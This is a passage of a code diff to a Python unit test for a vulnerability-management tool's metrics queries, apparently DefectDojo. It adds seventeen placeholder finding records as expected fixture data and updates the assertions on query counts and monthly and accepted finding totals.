False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "5d368a051fdec959e08315a32ef633ba5711bed6e8e75319ddee2cab4d4608c7", "line": None, "file_path": "", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_2 = {"id": 5, "title": "High Impact Test Finding", "date": date(2018, 1, 1), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "High", "description": "test finding", "mitigation": "test mitigation", 
"impact": "High", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 3, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 2, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "5d368a051fdec959e08315a32ef633ba5711bed6e8e75319ddee2cab4d4608c7", "line": None, "file_path": "", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_3 = {"id": 6, "title": "High Impact Test Finding", "date": date(2018, 1, 1), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "High", "description": "test finding", "mitigation": "test mitigation", "impact": "High", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 3, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 2, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "5d368a051fdec959e08315a32ef633ba5711bed6e8e75319ddee2cab4d4608c7", "line": None, "file_path": "", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_4 = {"id": 7, "title": "DUMMY FINDING", "date": date(2017, 12, 31), "sla_start_date": None, "sla_expiration_date": None, "cwe": 1, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, 
"cvssv3_score": None, "url": "http://www.example.com", "severity": "High", "description": "TEST finding", "mitigation": "MITIGATION", "impact": "High", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 3, "active": False, "verified": False, "false_p": False, "duplicate": False, "duplicate_finding_id": None, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 2, "under_defect_review": False, "defect_review_requested_by_id": 2, "is_mitigated": False, "thread_id": 1, "mitigated": None, "mitigated_by_id": None, "reporter_id": 2, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "c89d25e445b088ba339908f68e15e3177b78d22f3039d1bfea51c4be251bf4e0", "line": 100, "file_path": "", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_5 = {"id": 24, "title": "Low Impact Test Finding", "date": date(2018, 1, 1), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "Low", "description": "test finding", "mitigation": "test mitigation", "impact": "Low", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 33, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 22, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", "line": 123, "file_path": "/dev/urandom", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_6 = {"id": 125, "title": "Low Impact Test Finding", "date": 
date(2018, 1, 1), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "Low", "description": "test finding", "mitigation": "test mitigation", "impact": "Low", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 55, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": None, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", "line": 123, "file_path": "/dev/urandom", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": "12345", "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_7 = {"id": 225, "title": "UID Impact Test Finding", "date": date(2018, 1, 1), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "Low", "description": "test finding", "mitigation": "test mitigation", "impact": "Low", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 77, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 224, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "6f8d0bf970c14175e597843f4679769a4775742549d90f902ff803de9244c7e1", "line": 123, "file_path": "/dev/urandom", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": "6789", "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, 
"test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_8 = {"id": 240, "title": "High Impact Test Finding", "date": date(2018, 1, 1), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "High", "description": "test finding", "mitigation": "test mitigation", "impact": "High", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 3, "active": True, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 2, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "5d368a051fdec959e08315a32ef633ba5711bed6e8e75319ddee2cab4d4608c7", "line": None, "file_path": "", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_9 = {"id": 241, "title": "High Impact Test Finding", "date": date(2018, 1, 1), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "High", "description": "test finding", "mitigation": "test mitigation", "impact": "High", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 3, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 2, "out_of_scope": False, "risk_accepted": True, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "5d368a051fdec959e08315a32ef633ba5711bed6e8e75319ddee2cab4d4608c7", "line": None, "file_path": "", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, 
"effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_10 = {"id": 242, "title": "High Impact Test Finding", "date": date(2018, 1, 1), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "High", "description": "test finding", "mitigation": "test mitigation", "impact": "High", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 3, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 2, "out_of_scope": False, "risk_accepted": True, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "5d368a051fdec959e08315a32ef633ba5711bed6e8e75319ddee2cab4d4608c7", "line": None, "file_path": "", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_11 = {"id": 243, "title": "DUMMY FINDING", "date": date(2017, 12, 31), "sla_start_date": None, "sla_expiration_date": None, "cwe": 1, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": "http://www.example.com", "severity": "High", "description": "TEST finding", "mitigation": "MITIGATION", "impact": "High", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 3, "active": False, "verified": False, "false_p": False, "duplicate": False, "duplicate_finding_id": None, "out_of_scope": False, "risk_accepted": True, "under_review": False, "last_status_update": None, "review_requested_by_id": 2, "under_defect_review": False, "defect_review_requested_by_id": 2, "is_mitigated": True, "thread_id": 1, "mitigated": None, "mitigated_by_id": None, "reporter_id": 2, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "c89d25e445b088ba339908f68e15e3177b78d22f3039d1bfea51c4be251bf4e0", "line": 100, "file_path": "", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, 
"nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_12 = {"id": 244, "title": "Low Impact Test Finding", "date": date(2017, 12, 29), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "Low", "description": "test finding", "mitigation": "test mitigation", "impact": "Low", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 33, "active": True, "verified": True, "false_p": False, "duplicate": False, "duplicate_finding_id": None, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", "line": 123, "file_path": "/dev/urandom", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_13 = {"id": 245, "title": "Low Impact Test Finding", "date": date(2017, 12, 27), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "Low", "description": "test finding", "mitigation": "test mitigation", "impact": "Low", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 33, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 22, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", "line": 123, "file_path": "/dev/urandom", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, 
"unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_14 = {"id": 246, "title": "Low Impact Test Finding", "date": date(2018, 1, 2), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "Low", "description": "test finding", "mitigation": "test mitigation", "impact": "Low", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 33, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 22, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", "line": 123, "file_path": "/dev/urandom", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": None, "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_15 = {"id": 247, "title": "Low Impact Test Finding", "date": date(2018, 1, 3), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "Low", "description": "test finding", "mitigation": "test mitigation", "impact": "Low", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 55, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": None, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "9aca00affd340c4da02c934e7e3106a45c6ad0911da479daae421b3b28a2c1aa", "line": 123, "file_path": "/dev/urandom", "component_name": None, "component_version": None, "static_finding": 
False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": "12345", "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_16 = {"id": 248, "title": "UID Impact Test Finding", "date": date(2017, 12, 27), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "Low", "description": "test finding", "mitigation": "test mitigation", "impact": "Low", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 77, "active": True, "verified": True, "false_p": False, "duplicate": False, "duplicate_finding_id": None, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": True, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": "6f8d0bf970c14175e597843f4679769a4775742549d90f902ff803de9244c7e1", "line": 123, "file_path": "/dev/urandom", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": "6789", "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} +FINDING_17 = {"id": 249, "title": "UID Impact Test Finding", "date": date(2018, 1, 4), "sla_start_date": None, "sla_expiration_date": None, "cwe": None, "cve": None, "epss_score": None, "epss_percentile": None, "cvssv3": None, "cvssv3_score": None, "url": None, "severity": "Low", "description": "test finding", "mitigation": "test mitigation", "impact": "Low", "steps_to_reproduce": None, "severity_justification": None, "references": "", "test_id": 77, "active": False, "verified": False, "false_p": False, "duplicate": True, "duplicate_finding_id": 224, "out_of_scope": False, "risk_accepted": False, "under_review": False, "last_status_update": None, "review_requested_by_id": 1, "under_defect_review": False, "defect_review_requested_by_id": 1, "is_mitigated": False, "thread_id": 11, "mitigated": None, "mitigated_by_id": None, "reporter_id": 1, "numerical_severity": "S0", "last_reviewed": None, "last_reviewed_by_id": None, "param": None, "payload": None, "hash_code": 
"6f8d0bf970c14175e597843f4679769a4775742549d90f902ff803de9244c7e1", "line": 123, "file_path": "/dev/urandom", "component_name": None, "component_version": None, "static_finding": False, "dynamic_finding": False, "created": datetime(2017, 12, 1, 0, 0, tzinfo=timezone.utc), "scanner_confidence": None, "sonarqube_issue_id": None, "unique_id_from_tool": "6789", "vuln_id_from_tool": None, "sast_source_object": None, "sast_sink_object": None, "sast_source_line": None, "sast_source_file_path": None, "nb_occurences": None, "publish_date": None, "service": None, "planned_remediation_date": None, "planned_remediation_version": None, "effort_for_fixing": None, "test__engagement__product__prod_type__member": False, "test__engagement__product__member": True, "test__engagement__product__prod_type__authorized_group": False, "test__engagement__product__authorized_group": False} + + +ALL_FINDINGS = [FINDING_1, FINDING_2, FINDING_3, FINDING_4, FINDING_5, FINDING_6, FINDING_7, FINDING_8, FINDING_9, + FINDING_10, FINDING_11, FINDING_12, FINDING_13, FINDING_14, FINDING_15, FINDING_16, FINDING_17] +CLOSED_FINDINGS = [FINDING_11, FINDING_16] +ACCEPTED_FINDINGS = [FINDING_9, FINDING_10, FINDING_11] + + class FindingQueriesTest(DojoTestCase): - fixtures = ["dojo_testdata.json"] + fixtures = ["dojo_testdata.json", "unit_metrics_additional_data.json"] def setUp(self): user = User.objects.get(username="user1") - self.request = RequestFactory().get(reverse("metrics")) + self.request = RequestFactory().get(reverse("metrics"), { + "start_date": "2017-12-26", + "end_date": "2018-01-05", + }) self.request.user = user self.request._messages = MockMessages() @@ -49,14 +80,13 @@ def test_finding_queries(self, mock_timezone): mock_datetime = datetime(2020, 12, 9, tzinfo=timezone.utc) mock_timezone.return_value = mock_datetime - # Queries over Finding and Risk_Acceptance - with self.assertNumQueries(22): + # Queries over Finding + with self.assertNumQueries(27): product_types = [] finding_queries = utils.finding_queries( product_types, self.request, ) - self.assertSequenceEqual( list(finding_queries.keys()), [ @@ -73,64 +103,57 @@ def test_finding_queries(self, mock_timezone): "form", ], ) - # Assert that we get expected querysets back. This is to be used to # support refactoring, in attempt of lowering the query count. 
+ self.assertSequenceEqual(finding_queries["all"].values(), ALL_FINDINGS) + self.assertSequenceEqual(finding_queries["closed"].values(), CLOSED_FINDINGS) + self.assertSequenceEqual(finding_queries["accepted"].values(), ACCEPTED_FINDINGS) + self.assertSequenceEqual( - finding_queries["all"].values(), - [], - # [{'id': 226, 'title': 'Test Endpoint Mitigation - Finding F1 Without Endpoints', 'date': date(2022, 10, 15), 'sla_start_date': None, 'cwe': None, 'cve': None, 'cvssv3': None, 'cvssv3_score': None, 'url': None, 'severity': 'Info', 'description': 'vulnerability', 'mitigation': '', 'impact': '', 'steps_to_reproduce': '', 'severity_justification': '', 'references': '', 'test_id': 89, 'active': True, 'verified': True, 'false_p': False, 'duplicate': False, 'duplicate_finding_id': None, 'out_of_scope': False, 'risk_accepted': False, 'under_review': False, 'last_status_update': None, 'review_requested_by_id': None, 'under_defect_review': False, 'defect_review_requested_by_id': None, 'is_mitigated': False, 'thread_id': 0, 'mitigated': None, 'mitigated_by_id': None, 'reporter_id': 1, 'numerical_severity': 'S4', 'last_reviewed': None, 'last_reviewed_by_id': None, 'param': None, 'payload': None, 'hash_code': 'a6dd6bd359ff0b504a21b8a7ae5e59f1b40dd0fa1715728bd58de8f688f01b19', 'line': None, 'file_path': '', 'component_name': None, 'component_version': None, 'static_finding': False, 'dynamic_finding': True, 'created': datetime(2022, 10, 15, 23, 12, 52, 966000, tzinfo=pytz.UTC), 'scanner_confidence': None, 'sonarqube_issue_id': None, 'unique_id_from_tool': None, 'vuln_id_from_tool': None, 'sast_source_object': None, 'sast_sink_object': None, 'sast_source_line': None, 'sast_source_file_path': None, 'nb_occurences': None, 'publish_date': None, 'service': None, 'planned_remediation_date': None, 'test__engagement__product__prod_type__member': True, 'test__engagement__product__member': True, 'test__engagement__product__prod_type__authorized_group': False, 'test__engagement__product__authorized_group': False}] - ) - self.assertSequenceEqual( - finding_queries["closed"].values(), - [], - ) - self.assertSequenceEqual( - finding_queries["accepted"].values(), - [], - ) - self.assertSequenceEqual( - list(finding_queries["accepted_count"].values()), - [0, 0, 0, 0, 0, 0], + finding_queries["accepted_count"], + {"total": 3, "critical": 0, "high": 3, "medium": 0, "low": 0, "info": 0}, ) self.assertSequenceEqual( finding_queries["top_ten"].values(), [], ) self.assertEqual( - list(finding_queries["monthly_counts"].values()), - [ - [ - {"epoch": 1604188800000, "grouped_date": date(2020, 11, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0, "closed": 0}, - {"epoch": 1606780800000, "grouped_date": date(2020, 12, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0, "closed": 0}, + finding_queries["monthly_counts"], + { + "opened_per_period": [ + {"epoch": 1509494400000, "grouped_date": date(2017, 11, 1), "critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0, "total": 0, "closed": 0}, + {"epoch": 1512086400000, "grouped_date": date(2017, 12, 1), "critical": 0, "high": 2, "medium": 0, "low": 3, "info": 0, "total": 5, "closed": 2}, + {"epoch": 1514764800000, "grouped_date": date(2018, 1, 1), "critical": 0, "high": 6, "medium": 0, "low": 6, "info": 0, "total": 12, "closed": 0}, ], - [ - {"epoch": 1604188800000, "grouped_date": date(2020, 11, 1), "critical": 0, "high": 0, "medium": 